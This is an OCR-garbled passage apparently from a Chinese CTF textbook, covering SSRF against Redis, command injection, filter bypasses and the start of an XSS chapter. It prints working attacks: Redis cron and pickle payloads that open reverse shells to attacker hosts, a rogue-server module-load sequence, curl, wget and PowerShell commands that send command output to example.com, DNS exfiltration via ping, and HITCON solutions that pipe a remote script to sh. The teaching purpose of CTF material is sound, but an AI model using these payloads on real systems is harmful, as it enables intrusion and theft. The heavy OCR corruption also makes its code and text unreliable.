在 题目 中 ， 请 求 http:// 域 名 /tools.php? a=s&u=http://ip: 88/ testolk 等 价 于 http://127.0.0. 
1/tools.php? a=s&u=http://ip: 88/ testok; 同时 ， 信 息 搜集 可 以 从 phpinfo 中 获得 很 多 有 用 的 
言 乱 ， 如 redis 的 主机 ， 见 图 2-1-31。 


' | © 54.223.247.98:2222/phpinfo.php 
Pres ~ ~ So” Dae We ee un bs oa po nw Ss Oe ~ 


Environment 


图 2-1-31 
另外 ，libcur| 为 7.19.7 的 老 版 本 ， 只 支持 TFTP、FTP、Telnet、DICT、HTTP、FILE 协 议 ， 
协议 攻击 Redis， 但 其 实 使 用 DICT 协 议 同样 可 以 攻击 Redis， 最 后 的 攻击 流程 如 下 : 


54.223.247.98:2222/tools.php?a=s&u=dict://www.x.cn:6379/config:set:dir:/var/spool/cron/ 
54.223.247.98:2222/tools.php?a=s&u=dict://www.x.cn:6379/config:set:dbfilename:root 
54.223.247.98:2222/tools.php?a=s&u=dict://wwn.x.cn:6379/set:0:"\xQa\xQa*/1\x20*\x20*\x20* 
\x20*\x20/bin/bash\x20-i\x20>\x26\x28/dev/tcp/vps/8888\x200>\x261\xQa\xQa\xOa" 
54.223.247.98:2222/tools.php?a=s&u=dict://wwuw.x.cn:6379/save 
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jy 填 结 见 图 2-1-32。 


2. 护 网 怀 2019 easy python 
2019 年 护 网 杯 中 有 一 道 SSRF 攻 击 Redis 的 题目 。 我 们 赛 后 模拟 了 题目 进行 复 盘 ， 当 作 实 例 进行 分 析 。 


首先 ， 随 意 登 录 ， 发 现存 在 一 个 flask 的 session 值 ， 登 录 后 为 一 个 请 求 的 功能 ， 随 意 对 自己 的 VPS 进 
行 请 求 ， 会 得 到 图 2-1-33 所 示 的 信息 。 


天 键 信 息 是 使 用 了 Python 3 和 urllib， 僵 看 返回 包 ， 可 以 得 到 如 图 2-1-34 所 示 的 信息 。 


Accept-Encodineg: lidentity 
od A ep a 
jser-Agent: Python-urllib/3.7/ 
onnection: close 


图 2-1-33 


图 2-1-34 
看 到 返回 包 中 的 Nginx， 有 经 验 的 参赛 者 会 猜 到 是 Nginx 配 置 错误 导致 目录 穿越 的 漏洞 ， 而 题目 虽然 
没有 开 目 录 人 遍历， 但 是 仍然 可 以 构造 从 /static./_pycache /获取 pyc 文 件 。 由 于 不 知道 文件 名 ， 遍 
历 常用 文件 名 ， 可 以 得 到 main.cpython-37.pyc 和 views.cpython-37.pyc， 见 图 2-1-35。 
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用 是 Intruder attack 1 
Attack Save _ Columns 


Results OO 


人 -| Timeout | Length -一 JComment 


HTTP/1.1 200 OK 

Server nginx/1.10.3 

Date: Sun, 08 Dec 2019 09:15:32 GMT 

Content-Type: application/octet-stream 

Content-Length: 697 

Last-Modified: Sun, 01 Dec 2019 03:28:42 GMT 

Connection: close 

ETag: "5de3336a-2b9" 

Accenpt-Ranaes: bvtes - | 四 
@ (ee lash) (> Type a search term 0 matches 
Finished 


图 2-1-35 
然后 对 请 求 功能 进行 测试 ， 友 现 不 允许 请 求 本 机 地 址 ， 见 图 2-1-36。 


其 实 这 里 针对 本 地 的 绕 过 很 简单 ， 查 看 代码 友 现 过 滤 并 不 严格 ,使 用 0 代表 本 机 即 可 ， 见 图 2-1-37.。 


Hello test 


请 求 地 址 : http://127.0.0.1 


图 2-1-36 


Hello test 


请 求 地 址 : http://o 


Redirecting... 


You should be redirected automatically to target URL: /login/. If not click the link. 
图 2-1-37 
pyc 反 编译 ， 得 全 源码 后 ， 可 知 后 端 存 在 一 个 没有 密码 的 Redis， 那 么 明显 需要 攻击 Redis。 这 里 结合 
之 前 得 到 的 信息 ， 猜 测 使 用 CVE-2019-9740 (Python urllib CRLF a 应 该 可 以 实现 攻击 目 
的 。 而 这 里 无 法 通过 常规 的 攻击 方法 反弹 shell 或 者 直接 写 webshell， 通 过 阅读 flask-session 库 的 代码 


可 知 仓 入 的 数据 是 pickle 序 列 化 后 的 字符 串 ， 那 么 我 们 可 以 通过 这 个 CRLF 漏 洞 写 入 一 个 恶意 的 序列 化 
字符 串 ， 再 访问 页 面 触 发 反弹 回 shell， 写 入 恶意 序列 化 字符 串 代 码 如 下 : 


class ExpLoit(): 
def __init__(self, host, port): 
self.url = 'http: Wen %s' % (host, port) 


* ~ 
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seLf.req = Frequesrs.Sess10nLJ) 
def random_str(self): 
import random，string 
return ''.join(random.sample(string.ascii_letters, 10)) 


def do_exploit(self): 

self.req.post(self.url + '/login/', data={"username":self.random_str()}) 

payload2 = '0:6379?\r\nSET session:34d7439d-d198-Hea9-bcc6-11cg@fb7df25a"\\x80\\ 
xQ3cposix\\nsystem\\nq\\xOOXO\\xO0\\xO0\\xO0bash -ce \\"sh -i >& /dev/tcp/ 
172.20.0.3/1234 0>&1\\"q\\x01\\x85q\\x02Rq\\x03."\r\n’' 

res = self.req.post(self.url + '/request/', data={ 

uri: hetps /A payvloady + 9 23233772 
}) 


print(res.content) 
if __name__ == "__main__": 


exp = Exploit(sys.argv[1], sys.argv[2]) 
exp.do_exploit() 


通过 在 弹 回 来 的 shell 中 查看 信息 ， 可 以 知道 需要 进行 提 权 ， 见 图 2-1-38。 


root@b27cc35574a3:/data# nc -lv 

Listenine on [any] 1234 ... 

onnect to [172.26.6.3] from deploy_easy_python_1.deploy_default [172.26.6.2] 39530 
h: 8 tty; job control turned off 


16 Dec 1 63:28 aeh0iephaeshi9eephabilaekahhoh9o flae 


66:17:68 redis-server 12 
80:80:00 redis-cli 
080:060:00 erep redis 


图 2-1-38 


拿 到 shell 后 ， 信 息 搜 集 友 现 ，Redis 是 使 用 root 权 限 局 动 的 ， 但 写 SSH 私 钥 和 webshell 等 不 太 现 实 ， 
于 是 考虑 可 以 利用 Redis 的 主 从 模式 (在 2019 年 的 WCTF2019 Final 上 ，LC4BC 战 队 成 员 在 赛 后 分 享 
上 介绍 了 由 于 redis 的 主 从 复制 而 导致 的 新 的 RCE 利 用 方式 ) 去 RCE 读 flag。 

这 里 介绍 Redis 的 主 从 模式 。Redis 为 了 应 对 读 写 量 较 大 的 问题 ， 提 供 了 一 种 主 从 模式 ， 使 用 个。 
实例 作为 主机 只 负责 写 ， 其 余 实 例 都 为 从 机 ， 只 负责 读 ， 主 从 机 间 数 据 相 同 ， 其 次 在 Redis 4.x 后 新 
增加 了 模块 的 功能 ， 通 过 外 部 的 扩展 可 以 实现 一 条 新 的 Redis 命 令 ， 因 为 此 时 已 经 完全 控制 了 Redis， 

所 以 可 以 通过 将 此 机 设置 为 自己 VPSs 的 从 机 ， 在 主机 上 通过 FULLSYNC 同 步 备 份 一 个 恶意 扩展 到 从 机 


上 加 载 。 在 Github 上 可 以 搜 到 关于 该 攻击 的 exp， 如 https://github.com/n0bOdyCN/redis-rogue- 
server 


这 里 因为 触 友 氮 的 原因 ， 不 能 完全 使 用 上 述 exp 提 供 的 流程 去 运行 。 


先 在 shell 中 设置 为 VPS 的 从 机 ， 青 设置 dbfilename 为 exp.so， 手 动 执 行 完 exp 中 的 前 两 步 ， 见 图 2-1- 
39 


ef runserver(rhost, rport, lhost, lport): 


= Remote(rhost, rport) 

info("Setting master...") 

remote.do(f"SLAVEOF {lhost} {lport}") 

info("Setting dbfilename...") 
| remote.do(f"CONFIG SET dbfilename {SERVER_EXP_MOD_FILE}") 

和 - Et 
= RogueServer( thost， tport) 
es 
sleep(2) 
info("Loading module,..”") 
remote.do(f"MODULE LOAD ./{SERVER_EXP_MOD_FILE}") 
info("Temerory cleaning up...") 
remote.do("SLAVEOF NO ONE") 
remote.do("CONFIG SET dbfilename dump.rdb") 
remote,.shell_cmd(f"rm ./{SERVER_EXP_MOD_FILE}") 
rogue.close() 


图 2-1-39 
然后 去 掉 加 载 模块 后 面 的 所 有 功能 ， 在 VPS 上 运行 exp。 最 后 在 Redis 上 手动 执行 剩 下 的 步骤 ， 使 用 扩 
展 提供 的 功能 读 取 flag 即 可 ， 见 图 2-1-40。 


127.0.0.1:6379> system.exec 'id' 

”uid=6(root) gid=6(root) groups=0(root)\n" 

127.0.0.1:6379> System.exec “cat /aehbiephaeshi9eephabitaekahhoh9o_flae- 
"flLae{QuaoziZae9aech8oos7kei9vumaiBah7}\n” 

127.6.6.1:6379> 是 


图 2-1-40 
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2 命令 执行 漏洞 


DAE 
的 命令 ,使 整 台 服 务 器 处 于 危险 中 。 作 为 一 名 CTFer， 命 令 执 行 的 用 途 如 下 : 技巧 于 十 接 获取 
;@ 进 行 反弹 Shell， 然 后 进入 内 网 的 大 门 ;@ 利 用 出 题 人 对 权限 的 控制 不 严格 ， 对 题目 环境 拥有 控 
制 权 ， 导 致 其 他 队伍 选手 无 法 解 题 ， 这 样 在 时 间 上 会 占 一 定 优势 。 


在 CTF 中 ， 命 令 执 行 一 般 发 生 在 远程 ， 故 被 称 为 远程 命令 执行 ， 即 RCE (Remote Command 
Xe 
) ， 也 被 称 为 RCE (Remote Code Exec) 。 本 节 的 RCE 缘 为 远程 命令 执行 。 


本 世 将 阐述 常见 的 RCE 漏 洞 和 绕 过 WAF 的 方案 ,再 通过 一 些 经 典 题 目 让 读者 对 CTF 中 的 RCE 题 目 有 所 
了 解 。 


2.2.1 命令 执行 的 原理 和 测试 方法 

下 面 介 绍 命令 注入 的 基本 原理 ， 包 括 cmd.exe、bash 程 序 在 解析 命令 的 时 候 会 存在 哪些 问题 、 在 不 同 

的 操作 系统 中 执行 命令 会 存在 哪些 异同 点 等 ， 以 及 在 CTF 题 目 中 应 该 如 何 进行 测试 ， 直到 最 终 获 取 ， 
日 


2.2.1.1 命令 执行 原理 
在 各 类 编程 语言 中 ， 为 了 方便 程序 处 理 ， 通 常会 存在 各 种 执行 外 部 程序 的 函数 ， 当 调用 函数 执行 命令 
目 未 对 输入 做 过 滤 时 ， 通 过 注入 恶意 命令 ， 会 造成 巨大 的 危害 。 


下 面 以 PHP 中 的 system() 函 数 举例 : 


// 执行 echo 程序 ， 将 传 参 的 字符 串 输出 到 网 页 


该 代码 的 正常 功能 是 调用 操作 系统 的 echo 程 序 ， 将 从 d 人 参数 接收 的 字符 串 作 为 echo 程 序 的 输入 
system() 函 数 将 echo 程 序 执行 的 结果 返回 在 网 页 中 ， 其 在 操作 系统 执行 的 命令 为 “echo 

esS 
” ， 最 终 在 网 页 显示 为 “for test”， 见 图 2-2-1。 


Le 
\ © http://www.null.com/exec.php?d=for test Pubcl null, 
EE ED 一 








当 改 变 d 参 数 为 “for test%26%26 whoami” 时 ， 网 页 会 多 出 whoami 程 序 的 执行 结果 ， 这 是 因为 
当前 在 系统 执行 的 命令 为 “echo for test&&whoami”， 见 图 2-2-2。 


# a- | 
(CROSS 而 
for test testaaa\l3m0n 


图 2-2-2 
通常 为 了 解决 URL 中 的 歧义 表达 ， 会 将 一 些 特殊 字符 进行 URL 编 码 ，“%26” 便 是 “&” 的 URL 编 
码 。 为 什么 注入 “&&” 字 符 就 可 以 造成 命令 注入 呢 ? 类 似 的 还 有 其 他 什么 字符 吗 ? 


企 各 类 编程 语言 “&&” 是 and 语 法 的 表达 ， 一 般 通 过 如 下 格式 进行 调用 : 


当 两 边 的 表达 式 都 为 真 时 ， 才 会 返回 真 。 类 似 的 语法 还 有 or， 通 常用 “||” 表 示 。 注 意 ， 它 们 存在 惰 


ia nli 五 ~ 士 [ 叶 二 上 生生、 人 、 - CIA ==e ?| = 中 上 | 一 人、 = 时 全 ni El = 
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法 类 比 ， 若 第 一 个 表达 式 为 真 ， 则 第 二 个 表达 式 也 不 会 执行 ， 因 为 它 恒 为 真 。 


所 以 ,命令 注入 就 是 通过 注入 一 些 特殊 字符 ， 改 变 原 本 的 执行 意图 ， 从 而 执行 攻击 者 指定 的 命令 。 


2.2.1.2 命令 执行 基础 


在 测试 前 ,我 们 需要 了 解 cmd.exe、bash 程 序 在 解析 命令 时 的 规则 ， 掌 握 Windows、Linux 的 异同 


1. 转 义 字符 


系统 中 的 cmd.exe、bash 程 序 执行 命令 能 够 解析 很 多 特殊 字符 ， 它 们 的 存在 让 BAT 批 处 理 和 bash 脚 本 
处 理工 作 更 加 便捷 ， 但 是 如 果 想 去 掉 特 殊 字符 的 特殊 意义 ， 就 需要 进行 转 义 ， 所 以 转 义 字符 即 为 取消 
字符 的 特殊 意义 。 


Windows 的 转 义 字符 为 “^”，Linux 的 转 义 字符 为 人 \”， 分 别 见 图 2-2-3 和 图 2-2-4。 可 以 看 到 ， 原 
本 存在 特殊 意义 的 “ 公 ” 被 取消 意义 ， 从 而 在 终端 中 输出 。 


2. 多 条 命令 执行 


在 命令 注入 中 通常 需要 注入 多 条 命令 来 扩大 有 危害， 下面 是 一 些 能 够 构成 多 条 命令 执行 的 字符 串 : 
in 
下 ,，&&、、%0a; Linux 下 ，&&、|]、; 、$0、 ” 、%0a、%0d。 图 2-2-5、 图 2-2-6 分 别 为 
Windows 和 Linux 下 的 多 条 命令 执行 。 图 2-2-5 中 显示 了 “noexist|lecho pwnpwnpwn”， 
Noexis 


程序 本 身 不 存在 ， 所 以 报错 ,但 是 通过 注入 “||” 字 符 ， 即 使 前 面 报错 ， 还 会 执行 后 面 的 “echo 
pw 


在 上 面 的 例子 中 ，“&&” 和 “||” 利 用 条 件 执 进行 多 条 命令 执行 ，“%0a” 和 “%0d” 则 是 由 于 换 
行 而 可 以 执行 新 的 命令 。 另 外 ， 在 Linux 中 需要 注意 ， 双 引号 包 诸 的 字符 串 “$()” 或 “ ”中 的 内 容 
被 当 作 命令 执行 ， 但 是 单 引号 包括 的 字符 串 就 是 纯 字符 串 ， 不 会 进行 任何 解析 ， 见 图 2-2-7。 
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3. 注释 符号 


与 代码 注释 一 样 ， 当 合理 利用 时 ， 命 令 执 行 能 够 使 命令 后 面 的 其 他 字符 成 为 注释 内 容 ， 这 样 可 以 降低 
程序 执行 的 错误 。 


Windows 的 注释 符号 为 “::”， 在 BAT 批 处 理 脚本 中 用 得 较 多 ; Linux 的 注释 符号 为 “# ”， 在 bash 
脚本 中 用 得 较 多 。 


2.2.1.3 命令 执行 的 基本 测试 


在 面 对 未 知 的 命令 注入 时 ， 最 好 通过 各 种 Fuzz 来 确认 命令 注入 点 和 黑 名 单 规则 。 一 般 命 令 的 格式 如 
Wi 


程序 名 1 -程序 参数 名 1 参数 值 1 && 程序 2 -程序 参数 名 2 参数 值 2 


下 面 以 ping-nc 1 www.baidu.com 为 例 构建 Fuzz 列 表 。 


他 程序 名 : ping。 


依 参数 值 : 1 和 www.baidu.com。 


们 程序 名 与 参数 值 之 间 的 字符 串 : 空格 。 


人 
整个 命令 。 


EE 0 Eb =]: DE SEE: EES SL 
逸 。 比 如 ， 构 造 Fuzz 列 表 : 


curl Www 


再 通过 将 Fuzz 列 表 插入 命 4 令 点 后 , 通 可 看 让 己 服 务 器 的 Web 日 志 来 观察 是 否 存在 漏洞 . 


2.2.2 命令 执行 的 绕 过 和 技 15 


A 人 ~ od se We = Pa A 人 ~ -一 一 一 ee sk ks 


https: ee qq. com/web/reader/77d32500721 a485577d8eeek9bf321301f9bf31 c7ff0a60 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读书 
卫 人 和 = =| Eq bE 


制 、 题 目 接 下 来 的 衔接 。 但 是 命令 执行 比较 简单 、 粗 暴 ， 经 常 存在 技巧 性 绕 过 的 考点 。 


2.2.2.1 缺少 空格 


在 一 些 代 码 审计 中 经 常会 禁止 空格 的 出 现 或 者 会 将 空格 过 滤 为 空 ， 下 面 将 讲解 如 何 突破 。 例 如 ， 对 于 
如 下 PHP 代 码 : 


"mnm， 车 -GET['enmd'])， 
下 b 过 


将 cmd 参 数 中 的 空格 过 滤 为 空 ， 导 致 执行 “echo pwnpwn” 命令 失败 ， 见 图 2-2-8。 


但 是 在 命令 中 间隔 的 字符 可 以 不 只 是 空格 (URL 编 码 为 “”%20”) ， 还 可 以 利用 burp suite 对 %00 
~ %ff 区 间 的 字符 串 进行 测试 ， 可 以 发 现 还 能 用 其 他 字符 进行 绕 过 ， 如 “%09” “9%0b” “9%0c 
二 


利用 burp suite 进 行 Fuzz， 见 图 2-2-9。 再 次 输入 “9%09" 字符 ， 即 “echo%09pwnpwnpwn” ， 
就 能 发 现 可 以 绕 过 空格 的 限制 ， 见 图 2-2-10。 


ee wi = 
IS 
加 EE 
加 者 


alsTals olslslolslsTs lalalalsls) = (s| ala 
a olalals sllalaloTs Talslale] a [a] la 
上报、 扫 、 提 >、 报 、| E 提 -~ 提 ~ 失 “要 * 扫 ~ 提 ~ 提 ~ 乓 ~ 是 :是 站。 上;* 报 "， 


Raw [Headers [ Hex | 
HTTP/L1 200 OK 
Date: Tue, 14 May 2019 05:45:23 GMT 
Server Apache/2.4.23 (Win32) OpenSSL/1.0.2) PHP/5.5.38 
X-Powered-By: PHP/5.5.38 
Content-Length: 34 
Connection: close 
Content-Type: text/html 


CMD: echo0pwnpwnpwn<br>pwnpwnpwn 


国 国 国 国 开 一 一 


= 
| nullco .php?cmd=echo | 碟 null.col 

CMD: echo pwnpwnpwn 

pwnpwnpwn 


图 2-2-10 
中 一 种 通用 去 Fuzz 未 知情 况 的 方式 。 若 将 “%0a”“%0d” 等 不 可 见 


以 上 只 是 其 
字符 串 截取 的 方式 获取 空格 。 


1. Windows 下 


(人 加 


= ”相当 于 截取 竺 ， 表 示 获 取 环 境 变 量 %ProgramFiles% 的 值 ， 一般 为 C:\Program Files。 
所 以 ， 以 上 命令 表示 ， 从 第 10 个 开始 且 获 取 一 个 字符 串 ， 也 就 是 空格 ， 见 图 2-2-11。 
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图 2-2-11 
2. Linux 下 


Linux 中 也 有 一 些 绕 过 空格 执行 的 方式 : 
bash 有 效 ，zsh、dash 无 效 : 


读 取 文 件 时 : 


cat<>flag 


$IFS$9: Linux 存 在 IFS (Internal Field Separator) 环境 变量 ， 即 内 部 字段 分 隔 符 ， 定 义 了 bash 
she 

的 命令 间隔 字符 ， 一 般 为 空格 。 注 意 ， 当 只 注入 $1FS 时 ， 即 执行 的 命令 结果 为 echo$IFSaaa， 可 以 
发 现 解析 后 的 $lIFSaaa 变 量 是 不 存在 的 ， 所 以 需要 间隔 符 来 避免 ， 通常 使 用 “$9”。 “$9” 表示 为 当 


前 系统 Shell 进 程 的 第 9 个 参数 ， 通 党 是 一 个 空 字符 串 ， 即 最 终 能 成 功 执行 的 命令 为 “echoy$1Fs$9 
aaa 


11 
Le 


当然 ,还 可 以 使 用 “$IFS}” 进 行 注入 ， 或 者 在 某 些 平台 下 通过 修改 IFS 变 量 为 逗号 来 进行 注入 ， 即 
FS 由 图 2212; 


图 2-2-12 


2.2.2.2 黑 名 单 关 键 字 
在 CTF 比 赛 中 ， 有 了 时 会 遇 上 黑 名 单 关键 字 ， 如 对 cat、flag 等 字符 串 进 行 拦 截 ， 这 时 可 以 用 下 面 的 方式 


1. 利用 变量 拼接 


Linux: a=c;b=at;c=he;d=llo; $a$b ${c}${d} 


其 中 ，a 变 量 为 c，b 变 量 为 at， 最 终 $a$b 是 cat。c 变 量 为 he，d 变 量 为 llo， 最 终 ${c}${d} 为 hello， 所 


以 在 这 里 执行 的 命令 是 “cat hello”， 
2 . 使 用 通配符 


在 通配符 中 ，“? ”代表 任意 一 个 字符 串 ，“*” 则 代表 任意 个 字符 串 。 


cat /tm?/fl* 
type flax 


可 以 看 到 ， 上 面 通过 cat、type 命 令 ， 结 合 通 配 符 ， 实 现 了 对 黑 名 单字 符 串 的 绕 过 。 
3. 借用 已 有 字符 申 


用 “<>? ”等 字符 串 ， 则 可 以 借用 其 他 文件 中 的 字符 串 ， 利 用 substr() 遂 数 截 取出 某 个 具体 字 
EU 
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图 2-2-13 


2.2.2.3 执行 无 回 显 
在 CTF 中 ， 我 们 经 常 遇 到 命令 执行 的 结果 不 在 网 页 上 显示 的 情况 ， 这 时 可 以 通过 以 下 几 种 方式 获取 执 
行 结果 。 
在 开始 前 ， 推 荐 搭建 一 个 VTest 平 台 https://github.com/opensec-cn/vtest， 以 便 测 试 。 搭 建 完 
成 后 ， 开 始 测试 ， 测 试 代码 如 下 : 

a cmd']); 


1. HTTP 通 
假设 自己 的 域名 为 example.com， 下 面 以 获取 当前 用 户 权限 为 例 。 


在 Windows 下 ， 目 前 只 能 通过 相对 复杂 的 命令 进行 外 带 (如 果 未 来 Windows 支 持 Linux 命 令 ， 将 更 加 
方便 数据 外 带 ) : 


for /F %x in ('echo hello') do start http://example.com/httplog/%x 


通过 for 命 令 ， 将 echo hello 执 行 的 结果 保存 在 %x 变 量 中 ， 然 后 拼接 到 URL 后 。 


以 上 命令 执行 后 ， 默 认 浏 览 器 会 被 系统 调用 打开 并 访问 指定 的 网 站 ， 最 终 可 以 在 平台 上 面 获取 echo 
命令 的 执行 结果 ， 见 图 2-2-14。 


ae 


图 2-2-14 
但 是 其 缺陷 是 调用 浏览 器 后 并 不 会 天 二 ， 并 且 遇 上 特殊 字符 、 空 格 时 会 仓 企 截断 问题 ， 所 以 可 以 借用 
powershell 进 行 外 市 数据 。 在 Powershell 2.0 下 ， 执 行 如 下 命令 : 


for /F %x in ('echo hello') do powershell $a = [System.Convert]:: 
ToBase6dString([System. Text.Encoding]::UTF8.GetBytes('%x')); $b = New-Object 
System.Net .WebClient; $b.DownloadString('http://example.com/httplog/'+$a); 


这 里 是 对 echo hello 的 执行 结果 进行 Base64 编 码 ， 然 后 通过 Web 请 求 将 结果 发 送出 去 。 


在 Linux 下 ， 由 于 存在 管道 等 ， 因 此 极其 万 便 数据 的 传输 ， 通 党 利用 curl、wget 等 程序 进行 外 市 数 
据 。 例 如 : 


curl example.com/ “whoami. 
wget example.com/$(id|base64) 


上 面 便 是 利用 多 条 命令 执行 中 的 “” 和 和 “$0” 进行 字符 串 拼 接 ， 最 终 通过 curl、wget 等 命令 向 外 进 
行 请 求 ， 从 而 实现 了 数据 外 市 ， 见 图 2-2-15。 


图 2-2-15 
2 . DNS 通 道 
经 党 我 们 会 以 ping 来 测试 DNS 外 市 数据 ，ping 的 参数 在 Windows 己 Linux 下 有 些 不 同 。 如 限制 ping 
的 个 数 ， 在 Windows 下 是 “-n”， 而 在 Linux 下 是 “-c”。 为 了 兼容 性 处 理 ， 可 以 联合 使 用 ， 即 “ 
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-nc 1 test.example.com ” 。 


任 LinuXx 下 : 


大 处 理 ， 最 终 拼接 到 域名 前 缀 上 ， 再 利用 ping 
程序 进行 外 带 。 


<1> 获 取 计算 机 名 : 


<2> 获 取 用 户 名 : 


for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.example.com 


3 . 时间 盲 注 


网 络 不 通 时 ， 可 以 通过 时 间 盲 注 将 数据 跑 出 来 ， 主 要 借用 “&&” 和 “||” 的 惰性 ; 在 Linux 下 可 使 用 
sleep 遂 数 ， 在 Windows 下 则 可 以 选择 一 些 耗 时 命令 ， 如 ping-n 5 127.0.0.1。 


4. 写 入 文件 ， 二 次 返回 


有 时 会 遇 上 网 络 隔离 的 情况 ，time 型 读数 据 将 会 极其 缓慢 ， 可 以 考虑 将 执行 命令 结果 写 入 到 Web 目 录 
下 ， 骨 次 通过 Web 访 问 文件 从 而 达到 回 显 目的 。 例 如 ， 通 过 “>” 重 定 癌 ， de 
://www.nu1l.comy/exec/3.php? cmd=whoami>test 下 ， 再 次 访问 导出 文件 http://www.nu 

1l.com/exec/test， 便 可 以 得 到 结果 ， 见 图 2-2-16。 


图 2-2-16 


2.2.3 合 令 执行 具 题 讲解 
CTF 比 赛 中 单纯 考查 命令 注入 的 题目 较为 少见 ， 一 般 会 将 其 组 合 到 其 他 类 型 的 题目 ， 更 多 的 考点 偏向 
技巧 性 ， 如 黑 名 单 绕 过 、Linux 通 配 符 等 ， 下 面 介 绍 一 些 经 典 题目 。 


2.2.3.1 2015 HITCON BabyFirst 


PHP 代 码 如 下 : 


<?php 
highLight_fiLe(__FILE__); 
$dir = 'sandbox/' .$_SERVER['REMOTE_ADDR']; 
if (!file_exists($dir)) 
mkdir($dir); 
chdir($dir); 


$args = $_GET['args']; 
for ($i=0; $i<count($args); $i++) { 
if (!preg_match('/^\w+$/', $args[$i])) 
exit(); 
} 


exec("/bin/orange " .implode(" ", $args)); 


题目 为 每 人 创建 一 个 沙 盒 目 录 ， 然 后 通过 正则 “^NXw+$ 进行 字符 串 限 制 ， 难 点 在 于 正则 的 绕 过 。 
因为 正则 “/ANw+$/” 没 有 开启 多 行 匹 配 ， 所 以 可 以 通过 “An” (%0a) 换行 执行 其 他 命令 。 这 样 
便 可 以 单独 执行 touch abc 命 令 : 


/1.php?args[0]=x%0aS&args[1]=touch&args[2]=abc 


再 新 建文 件 1， 内 容 设置 为 bash 反 弹 shell 的 内 容 ， 其 中 192.168.0.9 为 VPS 服 务 器 的 IP，23333 为 有 反弹 
痛 口 。 然 后 利用 Python 的 pyftpdlib 模 块 搭建 一 个 匿名 的 FTP 服 务 ， 见 图 2-2-17。 
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图 2-2-17 
最 后 使 用 busybox 中 的 ftp 命 令 获 取 文 件 : 


将 IP 转 换 为 十 进 制 ， 即 192.168.0.9 的 十 进 制 为 3232235529， 可 以 通过 ping 验 证 最 终 请 求 的 IP 是 否 
确 的 。 


转换 脚本 如 下 : 


<?php 
$ip = "192.168.0.9"; 
$ip = explode('.', $ip); 
$r = ($ip[9] << 24) | ($ip[1] << 16) | ($ip[2] << 8) | $ip[3]; 
if ($r < 9) 1{ 

$r += 4294967296; 
} 
echo $r; 
> 


服务 器 监听 闯 口 情况 见 图 2-2-18。 


L3mOn@1 3mOndeMacBook 


$ 


lL 3mOn@1 3mOndeMacBook-Prd 


$ 
图 2-2-18 
2 个 解 题 过 程 如 下 。 利 用 FTP 下 载 反 弹 Shell 脚 本 : 


/1.php?args[9]=x%ga&args[1]=busybox&args[2]=ftpget&args[3]=3232235529&args[4]=1 


然后 执行 Shell 脚 本 : 


/1.php?args[0]=x%0a&args[1]=bash&args[2]=1 


2.2.3.2 2017 HITCON BabyFirst Revenge 


PHP 代 码 如 下 : 


<?php 
$sandbox = '/www/sandbox/' .md5("orange".$_SERVER['REMOTE_ADDR']); 
@mkdir($sandbox); 
@chdir($sandbox); 
if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 5) { 
@exec($_GET['cmd']); 


+ 
else if (isset($_GET['reset'])) { 
@exec('/bin/rm -rf'.$sandbox); 


上 面 的 代码 中 最 关键 的 限制 便 是 命令 长 度 限 制 ，strlen ($ GET['cmd']) <=5 意 味 着 每 次 执行 的 命 


令 长 度 只 能 小 于 等 于 5。 


解决 方法 是 利用 文件 名 按照 时 间 排序 ， 最 后 使 用 “Ils-t” 将 其 拼接 。 当 然 ， 在 拼接 的 过 程 中 ， 可 以 利 
用 八 ” 接 下 一 行 字符 串 ， 即 将 touch 程 序 用 和信” 分开 ， 见 图 2-2-19。 


最 终 ， 整 个 解 题 过 程 如 下 : 写 入 ls-t>g 到 文件 ; 写 入 payload; 执行 ， 生 成 gq 文件 ; 最 后 执行 g 文 
件 ， 从 而 反弹 Shell。 利 用 脚本 如 下 : 


图 2-2-19 
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payload = [ 
# generate ‘ls -t>g. file 


# generate ‘curl 192.168.0.9|sh. 
pa 

'>ba\\', 

EN 

NN 


] 


for i in payload: 
assert len(i) <= 5 


r = requests.get('http://127.0.0.1:20081/2.php?cmd=' + quote(i) ) 
print i 
sleep(2) 


其 中 生成 g 文 件 的 内 容 见 图 2-2-20。 


图 2-2-20 


图 2-2-20 


2.2.3.3 2017 HITCON BabyFirst Revenge v2 


PHP 代 码 如 下 : 


<?php 

$sandbox = '/www/sandbox/' .md5("orange".$_SERVER['REMOTE_ADDR']); 

@mkdir($sandbox); 

@chdir($sandbox); 

if (isset($_GET['cmd']) && strlen($_GET['cmd']) <= 4) { 
@exec($_GET['cmd']); 

4 

else if (isset($_GET['reset'])) { 
@exec('/bin/rm -rf' .$sandbox); 

} 

highLight_fiLe(__FILE__); 


这 就 是 之 前 BabyFirst Revenge 的 升级 版 本 ， 限 制 售 令 长 大 只 能 小 于 等 于 4。 其 中 ，ls> > 不 能 使 用 。 


在 Linux 下 ，“*” 的 执行 效果 类 似 “$ (dir*) ”， 即 dir 出 来 的 文件 名 会 被 当成 命令 执行 。 


# generate "g> ht- sl" to fiLe "v" 
Hoh 

| 

oe 

E> ht 

> 


t 的 顺序 是 比 s 靠 后 ， 所 以 可 以 找到 h 并 加 在 t 前 面 ， 以 提高 这 个 文件 名 最 后 排序 的 优先 级 。 所 以 ， 在 
“* 执行 时 ， 其 实 执 行 的 命令 为 : 


最 终 ，Vv 文 件 的 内 容 是 : 
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地 Re sl 


'>rev', 


接 下 来 写 入 一 个 rev 文 件 ， 然 后 使 用 “*v” 命 令 ， 因 为 只 有 rev、v 两 个 市 v 的 文件 ， 所 以 其 执行 的 命令 
是 “rev v”， 骨 将 逆转 的 Vv 文 件 内 容 帮 入 x 文件 。 


最 终 ，x 文 件 的 内 容 是 : 


后 面 写 payload 的 方式 与 V1 解 题 一 样 。 
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2.3 XSS 的 魔力 


跨 站 脚本 (Cross-site EN 
种 ， 人 允许 恶意 用 户 将 代码 注入 网 页 ， 其 他 用 户 在 观看 网 页 时 会 受到 影响 。 这 类 攻击 通常 包含 HTML 和 
用 户 端 脚本 语言 。 


XSS 攻 击 通 常 是 指 通 过 利用 网 页 开发 时 留 下 的 漏洞 ， 巧 妙 注入 恶意 指令 代码 到 网 页 ， 使 用 户 加 载 并 执 
行 攻 击 者 恶意 制造 的 网 页 程序 。 这 些 恶意 网 页 程序 通常 是 Javascript， 但 实际 上 可 以 包括 Java、 

、ActiveX、Flash 或 者 普通 的 HTML。 攻击 成 功 后 ， 攻 击 者 可 能 得 到 更 高 的 权限 (如 执行 一 些 操 
